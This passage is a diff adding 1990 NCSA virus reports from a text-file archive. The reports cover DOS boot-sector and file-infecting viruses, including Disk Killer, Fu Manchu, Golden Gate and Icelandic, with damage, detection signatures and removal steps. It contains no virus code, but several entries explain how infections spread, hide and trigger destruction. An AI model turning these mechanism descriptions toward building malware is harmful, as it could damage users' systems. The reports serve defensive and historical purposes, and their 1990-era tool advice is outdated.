whenever the system is rebooted, it will + display the message above, destroy the first copy of the FAT, then + proceed with the boot process. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa055.txt b/textfiles.com/virus/NCSA/ncsa055.txt new file mode 100644 index 00000000..fa7b51d6 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa055.txt @@ -0,0 +1,101 @@ + Ŀ + VIRUS REPORT + Disk Killer + + +Synonyms: Ogre, Disk Ogre, Computer Ogre. + +Date of Origin: Spring, 1989. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects both floppy and hard disk boot +sectors. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. Affects system +run-time operation. Corrupts program or overlay files. Corrupts data +files. Formats or erases all/part of disk. + +Detected by: Scanv39+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDISK, CleanUp, F-Prot, or DOS COPY and SYS commands. + + The Disk Killer is a boot sector virus that infects both hard disks +and floppies. + + The first organization to report this virus was Birchwood systems in +San Jose in early Summer, 1989. Additional reports were received from +Washington, Oklahoma, Minnesota and Arizona. It was finally isolated at +Wedge Systems in Milpitas, California. Disk Killer was isolated on +September 26, 1989. + + The virus spreads by writing copies of itself to three unused +clusters on either a floppy or hard disk, marking them as "bad" in the +FAT to prevent overwriting. The boot sector is modified to execute the +virus code during the boot, permitting it to infect any new disks exposed +to the system. + + The virus counts the number of disks it has infected and does no harm +until it has reached a predetermined limit. When the limit is reached or +exceeded and the system is rebooted, this message is displayed: + +"Disk Killer <197> Version 1.00 by COMPUTER OGRE. Don't turn off the +power or remove the diskettes while Disk Killer is processing! ... +PROCESSING ... Now you can turn off the power. I wish you luck." + + During "processing", it writes clusters of a single character +randomly all over the disk, effectively trashing it. + + Note that when the message is displayed, if the system is turned off +immediately it may be possible to salvage some files on the disk using +various utility programs, as this virus first destroys the boot sector, +FATs, and root directory. + + The internal messages do not appear in sector zero, but are stored in +sector 152 on floppy disks and an as yet undetermined location on hard +disks. This had always added to the confusion over the virus because +message remnants were sometimes discovered in the middle of executable +files, and it was assumed that the virus was a COM or EXE infector. + + If your boot sector does not contain the standard DOS error messages, +then immediately power down and clean out the boot. Infected boot +sectors begin with FAEB. You can check boot sectors with a tool such as +Norton's NU. If the DOS messages are not there (non-system disk; etc.), +then the system is infected. MDISK will remove the virus. + + Disk Killer can be removed by using MDisk, or the DOS SYS command, to +overwrite the boot sector on your hard disk or bootable floppies. On +non-system floppies, files can be copied to non-infected floppies, +followed by reformatting the infected floppies. Be sure to turn the +system off, then reboot the system from a write-protected master +diskette before attempting to remove the virus, or you will be +reinfected by the virus in memory. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa056.txt b/textfiles.com/virus/NCSA/ncsa056.txt new file mode 100644 index 00000000..9c6d5761 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa056.txt @@ -0,0 +1,73 @@ + Ŀ + VIRUS REPORT + Do Nothing Virus + + +Synonyms: Stupid virus + +Date of Origin: October, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Resident. Infects COM files. + +Increase in Size of Infected Files: 608 bytes. + +Nature of Damage: Corrupts program files. Does no apparent damage. + +Detected by: Scanv49+, F-Prot, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + + This virus was first reported in October, 1989 by Uval Tal in Israel. +It infects the first COM file in the current directory, and will +re-infect it again and again. It infects no other files, and causes no +other damage. + + It has been called the "stupid" virus because it is so ineffectual +compared to other viruses. For instance: + +* It always installs in memory in the same location, at address + 9800:100H + +* Any program which attempts to use this memory location destroys the + memory-resident copy of the virus. + +* It can only infect systems with 640K of memory. + +* It can not reach across directories. + +* It cannot determine if the file it is infecting has previously been + infected. + +* It does no apparent damage to anything but the first COM file in a + directory. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa057.txt b/textfiles.com/virus/NCSA/ncsa057.txt new file mode 100644 index 00000000..8c7c80ab --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa057.txt @@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + EDV + + +Date of Origin: January, 1990. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of both floppies and +hard disks, and infects hard disk partition tables. + +Increase in Size of Infected Files: n/a + +Nature of Damage: Corrupts or overwrites boot sector. Affects system +run-time operation. + +Detected by: Scanv58+, IBM Scan. + +Removed by: MDisk/P. + +Scan Code: "MSDOS Vers. E.D.V." appears at the end of the boot sector on +infected floppies. + + The EDV virus was first reported by David Chess at IBM. It is a boot +sector and partition table virus. Troublesome, it causes program crashes +and some data destruction. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa058.txt b/textfiles.com/virus/NCSA/ncsa058.txt new file mode 100644 index 00000000..d36c7291 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa058.txt @@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + Eight Tunes Virus + + +Synonyms: 1971 virus + +Date of Origin: January, 1990. + +Place of Origin: Germany. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM and EXE files. + +OnScreen Symptoms: Plays one of eight German folk songs on the speaker. + +Increase in Size of Infected Files: 1,975 bytes increase (about). + +Nature of Damage: Corrupts COM and EXE files. Affects system run-time +operation. Contains no destructive code. + +Detected by: Scanv62+. + +Scan Code: + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa060.txt b/textfiles.com/virus/NCSA/ncsa060.txt new file mode 100644 index 00000000..55320bbf --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa060.txt @@ -0,0 +1,46 @@ + Ŀ + VIRUS REPORT + Friday 13th-B + + +Host Machine: PC compatibles. + +Host Files: COM files. + +Nature of Damage: Corrupts COM files. + +Derived from: Friday 13th. + + This virus is identical to the original except that it infects every +file in the current subdirectory. It will also infect every COM file in +the system path if the infected COM program is in the path. The only way +this virus can spread beyond the current subdirectory is if an infected +program ends up in the system PATH. Then every COM file in the currently +selected subdirectory will get infected. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa061.txt b/textfiles.com/virus/NCSA/ncsa061.txt new file mode 100644 index 00000000..6baa9daf --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa061.txt @@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + Friday 13th-C + + +Host Machine: PC compatibles. + +OnScreen Symptoms: The message "We hope we haven't inconvenienced you" +appears upon activation. + +Nature of Damage: Corrupts COM files. + +Derived from: Friday 13th-B. + + This is the Friday the 13th-B except a message has been added that +displays - "We hope we haven't inconvenienced you" appears whenever +the virus activates. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa062.txt b/textfiles.com/virus/NCSA/ncsa062.txt new file mode 100644 index 00000000..860557cb --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa062.txt @@ -0,0 +1,92 @@ + Ŀ + VIRUS REPORT + Fu Manchu + + +Synonyms: 2080, 2086 + +Date of Origin: March 10, 1988. + +Place of Origin: written by Sax Rohmer. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, overlay files. + +OnScreen Symptoms: You may see the message "You will hear from me again!" + +Increase in Size of Infected Files: 2086 bytes for COM files, 2080 bytes +for EXE files. + +Nature of Damage: Affects system run-time operation. Corrupts COM and +EXE files. Some versions corrupt overlay, SYS, and BIN files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Derived from: Jerusalem. + +Scan Code: encrypted. You may be able to find the marker "sAXrEMHOr" in +infected files. You can also search at offset 1EEH for FC B4 E1 CD 21 80 +FC E1 73 16. + + The virus occurs attached to the beginning of a COM file, or the end +of an EXE file. It is a rewritten ("improved") version of the Jerusalem +virus, and most of what is said for that virus applies here with the +following changes: + +* The code to delete programs, slow down the machine, and display the + black window has been removed, as has the dead area at the end of the + virus and some sections of unused code. + +* The marker is now 'rEMHOr' (six bytes), and the preceeding 'sU' is + now 'sAX' (Sax Rohmer - creator of Fu Manchu). + +* COM files now increase in length by 2086 bytes & EXE files 2080 + bytes. EXE files are now only infected once. + +* One in sixteen times on infection a timer is installed which runs for + a random number of half-hours (maximum 7.5 hours). At the end of this + time the message "The world will hear from me again!" is displayed in + the center of the screen and the machine reboots. This message is + also displayed every time Ctrl-Alt-Del is pressed on an infected + machine, but the virus does not survive the reboot. + +* There is further code which activates on or after the first of August + 1989. This monitors the keyboard buffer, and makes derogatory + additions to the names of politicians (Thatcher, Reagan, Botha & + Waldheim), censors out two four-letter words, and to "Fu Manchu" adds + "virus 3/10/88 - latest in the new fun line!" All these additions go + into the keyboard buffer, so their effect is not restricted to the + monitor. All messages are encrypted. + + Some versions of this virus can infect overlay, SYS, and BIN files. +It is still rare in the U.S. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa063.txt b/textfiles.com/virus/NCSA/ncsa063.txt new file mode 100644 index 00000000..814f819c --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa063.txt @@ -0,0 +1,61 @@ + Ŀ + VIRUS REPORT + Ghost Virus (boot version) + + +Synonyms: Ghostballs + +Date of Origin: September, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: hard disk and floppy disk boot sectors. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. + +Detected by: Scanv46+, F-Prot. + +Removed by: CleanUp, MDisk, F-Prot, or use the DOS SYS command. + + This virus was discovered in September, 1989 by Fridrik Skulason at +Icelandic University. The virus infects the boot sectors of hard disks +and floppies. The virus replaces the boot sector of infected systems +with a boot virus similar to Ping Pong. Random file corruption by this +virus has been reported. + + The Ghost Boot virus is usually discovered along with the Ghost COM +virus. If you disinfect the boot sector to get rid of the Boot virus, +unless you also remove the COM virus, your boot sectors will again have +the Ghost Boot virus. It appears that the two viruses assist in the +propagation of each other. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa064.txt b/textfiles.com/virus/NCSA/ncsa064.txt new file mode 100644 index 00000000..56819dba --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa064.txt @@ -0,0 +1,67 @@ + Ŀ + VIRUS REPORT + Ghost Virus (COM version) + + +Synonyms: Ghostballs. + +Date of Origin: September, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: COM files. + +Increase in Size of Infected Files: 2351 bytes. + +Nature of Damage: Corrupts or overwrites boot sector; corrupts COM +files. + +Detected by: Scanv46+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDisk or DOS SYS command (accompanied by erasing infected +COM files), or use CleanUp or F-Prot. + + The Ghost viruses (both boot and COM) were discovered at Icelandic +University by Fridrik Skulason. The Ghost COM virus infects generic COM +files, increasing the file size by 2,351 bytes. + + Symptoms of this virus are very similar to the Ping Pong virus, and +random file corruption may occur on infected systems. + + The Ghost COM virus may be the first virus to infect both files (COM +files in this case) and boot sectors. After the boot sector is infected, +it also acts as a virus (see Ghost BOOT virus). + + To remove this virus, turn off the computer and reboot from a +write-protected disk. Then use MDisk, NDD, or the DOS SYS command to +replace the boot sector on the infected disk. Any infected .COM files +must also be replaced with clean copies. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa065.txt b/textfiles.com/virus/NCSA/ncsa065.txt new file mode 100644 index 00000000..ce49d1d9 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa065.txt @@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Golden Gate Virus + + +Synonyms: the 500 Virus, Mazatlan. + +Host Machine: PC compatibles. + +Host Files: boot sector. + +Increase in Size of Infected Files: n/a + +Nature of Damage: Infects boot sector of floppies, may eventually +reformat the hard disk. + +Detected by: ScanV60+. (Identifies it as the Alameda). + +Removed by: MDisk, F-Prot, or the DOS SYS command. + +Derived from: Alameda. + + This is the Alameda or SF Virus that has been modified to format the +C: drive when the counter runs out. The activation occurs after 500 +infections, instead of 100 infections. Note that in all three of these +strains, the counter is zeroed on the host diskette at infection time. +Thus, the activation period on this virus will on the average stretch +into many years. No corruption will occur until 500 new diskettes have +been infected from within a given machine. Since the infection can only +occur when the system is booted with a new diskette, infection is not +frequent with this virus. The majority of infections will probably never +activate. The IBM PC will have long since been supplanted by another +architecture in most environments. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa066.txt b/textfiles.com/virus/NCSA/ncsa066.txt new file mode 100644 index 00000000..144821fb --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa066.txt @@ -0,0 +1,45 @@ + Ŀ + VIRUS REPORT + Golden Gate-B + + +Host Machine: PC compatibles. + +Host Files: infects the boot sector of floppy disks. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: May only infect floppies. May do no other damage. + +Derived from: Golden Gate virus. + + This virus is the Golden Gate virus that has had the activation delay +reset to 30 infections. This virus should activate within a couple of +years in most environments. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa067.txt b/textfiles.com/virus/NCSA/ncsa067.txt new file mode 100644 index 00000000..8e57c493 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa067.txt @@ -0,0 +1,50 @@ + Ŀ + VIRUS REPORT + Golden Gate-C + + +Synonyms: Mazatlan virus. + +Host Machine: PC compatibles. + +Host Files: boot sector of floppies and hard disk. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: infects both floppies and hard disks. May reformat +hard disks. + +Derived from: Golden Gate-B virus. + + This virus is the Golden Gate virus that is able to infect a hard +disk. It is a nasty virus, since it has more of an opportunity to do +damage than previous versions. Prior versions were limited since systems +with hard disks are only infrequently booted from floppy and booting +from the hard disk overwrote earlier versions. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa068.txt b/textfiles.com/virus/NCSA/ncsa068.txt new file mode 100644 index 00000000..1c458f44 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa068.txt @@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Golden Gate-D + + +Host Machine: PC compatibles. + +Derived from: Golden Gate-C. + + This virus is identical to Golden Gate-C, except the counter has been +disabled (similar to original Alameda). + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa069.txt b/textfiles.com/virus/NCSA/ncsa069.txt new file mode 100644 index 00000000..e163f407 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa069.txt @@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Halloechen Virus + + +Place of Origin: West Germany + +Host Machine: PC compatibles. + +Host Files: COM and EXE files. Memory resident. + +OnScreen Symptoms: keyboard input will appear garbled. + +Increase in Size of Infected Files: 2,011 bytes. + +Detected by: Scanv57+. + +Removed by: delete infected files or run Scan/D. + + First reported by Christoff Fischer of the University of Karlsruhe, +West Germany. It is now widespread in West Germany. + + When an infected program is run, Halloechen installs in memory. From +memory, it infects any EXE or COM which is run, providing the program is +less than about 62K in size, and has a file date outside the current +system date's month. During the infection, the file's size is increased +to a multiple of 16, then the 2,011 bytes of virus code are added to it. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa070.txt b/textfiles.com/virus/NCSA/ncsa070.txt new file mode 100644 index 00000000..115ba951 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa070.txt @@ -0,0 +1,57 @@ + Ŀ + VIRUS REPORT + Holland Girl + + +Synonyms: 1332 virus, Sylvia. + +Place of Origin: the Netherlands. + +Host Machine: PC compatibles. + +Host Files: COM files. Remains resident. + +Increase in Size of Infected Files: 1332 bytes. + +Nature of Damage: Corrupts program or overlay files. + +Detected by: Scanv50+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, F-Prot, or Scan/D. + + This virus was first reported by Jan Terpstra in the Netherlands. It +infects COM files (but not COMMAND.COM), increasing their size by 1332 +bytes. + + It contains the name, address, and phone number of a Dutch woman +named Sylvia, and requests that post cards be sent to her. It may have +been written by an ex-boyfriend. + + Potential damage from this virus is not yet known. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa071.txt b/textfiles.com/virus/NCSA/ncsa071.txt new file mode 100644 index 00000000..52059926 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa071.txt @@ -0,0 +1,82 @@ + Ŀ + VIRUS REPORT + Icelandic 1 + + +Synonyms: Saratoga 1, Icelandic, One in Ten, Disk Crunching Virus. + +Date of Origin: June, 1989. + +Place of Origin: Iceland. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +Increase in Size of Infected Files: 642 bytes. A variant adds 656 bytes. +Another grows by 671 bytes. File lengths after infection are divisible +by 16. + +Nature of Damage: Affects system run-time operation. Corrupts program +files. + +Detected by: Scanv56+, F-Prot, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Scan Code: Infected files always end with 44 18 5F 19. You can also +search at offset 0C6H for 2E C6 06 87 02 0A 90 50 53 51. + + The Icelandic virus was first detected in June, 1989, disassembled a +week later, and the disassembly was made available around the beginning +of July. The basic Icelandic virus is a resident EXE-file infector that +infects every second EXE file executed, and sometimes will mark a free +cluster on a hard disk as bad (the "damage" routine). + + The Icelandic virus will copy itself to the top of free memory the +first time an infected program is executed. Once in high memory, it hides +from memory mapping programs. If a program later tries to write to this +area of memory, the computer will crash. If the virus finds that some +other program has "hooked" Interrupt 13, it will not proceed to infect +programs. If Interrupt 13 has not been "hooked", it will attempt to +infect every 10th program executed. + + The virus attaches itself to the end of the programs it infects, and +infected files will always end with "4418,5F19"H. + + On systems with 12-bit FATs (floppy drives or 10 MB hard disks), the +virus will not cause any damage. However, on systems with 16-bit FATs +(hard disks larger than 10 MB), the virus will select one unused FAT +entry and mark the entry as a bad sector each time it infects a program. + + It is likely that as of this writing, the virus has not been detected +outside of Iceland. Several variants are known, including Saratoga 2, +Icelandic Virus Version 2, and MIX1. See also the table.<$&3 Icelandic> + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright 